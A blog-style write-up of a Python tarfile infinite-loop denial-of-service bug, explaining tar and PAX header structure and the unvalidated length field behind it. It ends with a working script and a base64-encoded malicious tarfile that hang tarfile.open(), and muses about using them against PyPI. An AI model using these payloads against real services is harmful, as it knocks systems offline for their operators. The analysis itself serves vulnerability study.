Python tarfile infinite loop DoS
The Python tarfile module can end up in an infinite loop when opening maliciously malformed tar files.
I came across the denial-of-service bug bpo39017 when browsing the Python bug tracker for security issues (I didn't discover this bug myself). The error-reproducing tarfile the reporter uploaded is straight from the fuzzer, but I wanted to understand and isolate the issue by making the smallest tarfile which reproduces the bug.
Tarfile structure #
The name tar is derived from "tape archive" which harks back to its 1979 release to help store multiple files on magnetic tape. Tar files are made up of blocks of 512 bytes. There's no overall header or central directory: to list files you'll need to scan through the tarfile and read all the header records. Any header struct (257 bytes) or content will be padded to the block size, so most of a tarfile will be NULL bytes. The header is a bit gross, having integer fields encoded as ASCII digits in octal.
Serious tarfile vulnerabilities #
The tarfile headers contain the archived filenames. If the filename is an absolute path, some tarfile implementations can be tricked into extracting files to arbitrary locations. Arbitrary write may also be possible when extracting symlinks. The same issues affect other archive formats. This post isn't about these vulnerabilities.
PAX #
The bug is in the Python tarfile module's processing of PAX header records. PAX is a set of extensions to tar which add properties left out of the original tar header struct, or which don't fit within the fixed-size fields defined in times gone by, e.g. symlinks, arbitrary-resolution timestamps, uids > 2097151, file sizes > 8GB, long filenames. If we want to specify PAX information for a file, we make a fake file with the typeflag in the header record set to x or g. The fake file's content is the extra PAX headers. The next block can contain the normal header record for the file, followed by blocks containing the file contents.
You can try to make a PAX tarfile. (Without --blocking-factor=1, tar pads the archive out to a whole record, which is some multiple of 512 bytes.)
echo "myfilecontent" > myfile
tar -cf hello.tar --format=pax --blocking-factor=1 myfile
hexdump -C hello.tar
00000000 2e 2f 50 61 78 48 65 61 64 65 72 73 2e 31 39 31 |./PaxHeaders.191| # Header for fake file
00000010 37 37 2f 6d 79 66 69 6c 65 00 00 00 00 00 00 00 |77/myfile.......|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000060 00 00 00 00 30 30 30 30 36 34 34 00 30 30 30 30 |....0000644.0000|
00000070 30 30 30 00 30 30 30 30 30 30 30 00 30 30 30 30 |000.0000000.0000|
00000080 30 30 30 30 30 36 31 00 30 37 30 33 33 32 34 31 |0000061.07033241|
00000090 36 30 30 00 30 31 32 31 36 34 00 20 78 00 00 00 |600.012164. x...|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000100 00 75 73 74 61 72 00 30 30 00 00 00 00 00 00 00 |.ustar.00.......|
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000200 31 39 20 61 74 69 6d 65 3d 39 34 36 36 38 34 38 |19 atime=9466848| # PAX header records
00000210 30 30 0a 33 30 20 63 74 69 6d 65 3d 31 35 39 34 |00.30 ctime=1594|
00000220 33 34 30 33 32 30 2e 38 30 31 30 37 35 30 36 35 |340320.801075065|
00000230 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000400 6d 79 66 69 6c 65 00 00 00 00 00 00 00 00 00 00 |myfile..........| # File header
00000410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000460 00 00 00 00 30 30 30 30 36 34 34 00 30 30 30 31 |....0000644.0001|
00000470 37 35 30 00 30 30 30 31 37 35 30 00 30 30 30 30 |750.0001750.0000|
00000480 30 30 30 30 30 31 36 00 30 37 30 33 33 32 34 31 |0000016.07033241|
00000490 36 30 30 00 30 31 31 36 35 30 00 20 30 00 00 00 |600.011650. 0...|
000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000500 00 75 73 74 61 72 00 30 30 62 65 6e 00 00 00 00 |.ustar.00ben....|
00000510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000520 00 00 00 00 00 00 00 00 00 62 65 6e 00 00 00 00 |.........ben....|
00000530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000540 00 00 00 00 00 00 00 00 00 30 30 30 30 30 30 30 |.........0000000|
00000550 00 30 30 30 30 30 30 30 00 00 00 00 00 00 00 00 |.0000000........|
00000560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000600 6d 79 66 69 6c 65 63 6f 6e 74 65 6e 74 0a 00 00 |myfilecontent...| # File content
00000610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000c00 # 2 completely NULL blocks added at end
Notice those * lines, which stand for repeated lines of NULL bytes. 512 = 0x200, so blocks start at 0x0, 0x200, 0x400, 0x600, 0x800, 0xA00.
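To connect the dump to the block layout, here is a minimal sketch that decodes the two octal size fields visible at offsets 0x7c and 0x47c and adds up the blocks. The helper names parse_octal and padded_size are made up for illustration; they are not part of the tarfile module.

```python
BLOCK = 512

def parse_octal(field: bytes) -> int:
    """Decode a tar header integer field: ASCII octal digits, NUL/space padded."""
    digits = field.strip(b"\x00 ")
    return int(digits.decode("ascii"), 8) if digits else 0

def padded_size(size: int) -> int:
    """Round a content size up to a whole number of 512-byte blocks."""
    return -(-size // BLOCK) * BLOCK

# Size fields copied from the hexdump above.
pax_size = parse_octal(b"00000000061\x00")   # content of the fake PAX file
file_size = parse_octal(b"00000000016\x00")  # content of myfile

# Two header blocks, two padded contents, two all-NULL end blocks.
total = 2 * BLOCK + padded_size(pax_size) + padded_size(file_size) + 2 * BLOCK
print(pax_size, file_size, hex(total))
```

The total comes out at 0xc00, which matches the final offset in the hexdump.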
PAX headers structure #
A PAX header record is a UTF-8 encoded string of the format: "%d %s=%s\n", <length>, <keyword>, <value>
Several of these records can be concatenated.
The length is the length of the record, including the length field and the ending newline. The keyword cannot contain an equals sign. Standard keywords include 'path' & 'atime'.
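Because the length counts its own digits, building a record takes a small fixed-point loop. The following is a sketch under that reading of the format; pax_record is a hypothetical helper name, not a tarfile API.

```python
def pax_record(keyword: str, value: str) -> bytes:
    """Build one PAX record: b"<length> <keyword>=<value>\\n".

    The length covers the whole record, including its own decimal digits,
    so we keep re-measuring until the number stops changing.
    """
    body = b" " + keyword.encode("utf-8") + b"=" + value.encode("utf-8") + b"\n"
    length = len(body)
    while True:
        total = len(body) + len(str(length))
        if total == length:
            break
        length = total
    return str(length).encode("ascii") + body

print(pax_record("atime", "946684800"))
```

This reproduces the first record in the hexdump above, which starts with 19.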
The bug #
The length and keyword are extracted with a regex. That's not the problem. The problem is that the length is not validated and we use the length variable to iterate:
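import re

regex = re.compile(br"(\d+) ([^=]+)=")
pos = 0
while True:
    match = regex.match(buf, pos)
    if not match:
        break
    length, keyword = match.groups()
    length = int(length)  # taken from the file, never checked
    ...
    pos += length  # a length of 0 means pos never advances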
If length is zero, e.g. if buf contains "0 X=", we loop forever.
Does this affect other languages? #
In the Rust crate tar-rs, the block is first split on newline characters. The length field is then checked against the actual length of the record. I didn't see any tarfile documentation that forbids newline characters within a keyword. This library would reject such a record, but that's almost certainly OK. Go checks that the length is sensible and then that the record ends in a newline. Ruby and PHP seem OK.
This is probably a Python-only bug.
Exploitation #
First we make a 512-byte header block specifying that the following block is PAX information (type is 'x' or 'g'). Then we append "0 X=" for a total of 516 bytes.
Feed the output file into tarfile.open() or tarfile.is_tarfile() and wait a very long time. Or try pip install recursion.tar. I'd imagine that the PyPI server is vulnerable to this, but untrusted tarfiles aren't ingested by too many Python services as far as I'm aware.
Script for minimal reproducing tarfile:
def make_file() -> bytearray:
    header = bytearray(512)
    header[0x7c] = 0x31  # size = ASCII '1' (must be > 0)
    header[0x94:0x9d] = b"000630\x00 g"  # chksum + typeflag 'g'
    return header + b"0 X="

with open("recursion.tar", "wb") as f:
    f.write(make_file())
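The 000630 in the script is the header checksum: the sum of all 512 header bytes, with the eight checksum bytes themselves counted as spaces. A quick sketch to check the arithmetic (tar_checksum is a hypothetical helper name):

```python
def tar_checksum(header: bytes) -> int:
    """Sum the header bytes, treating the chksum field (offsets 148-155) as spaces."""
    if len(header) != 512:
        raise ValueError("a tar header is exactly 512 bytes")
    return sum(header[:148]) + 8 * 0x20 + sum(header[156:])

header = bytearray(512)
header[0x7c] = 0x31      # size field: ASCII '1'
header[0x9c] = ord("g")  # typeflag: global PAX header
print(oct(tar_checksum(header)))
```

Only two bytes are non-zero, so the sum is 0x31 + 0x67 plus 8 * 0x20 for the blanked checksum field, which is 408, or 630 in octal.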
Downloads #
- an evil tarfile
- base64 decode this tar.gz
H4sICANcB18AA3gAS0pOzMlJLWIYCGCIQ9zAwMjQ1JRBIZ2urhmZwEAhwhYAT1CwIgQCAAA=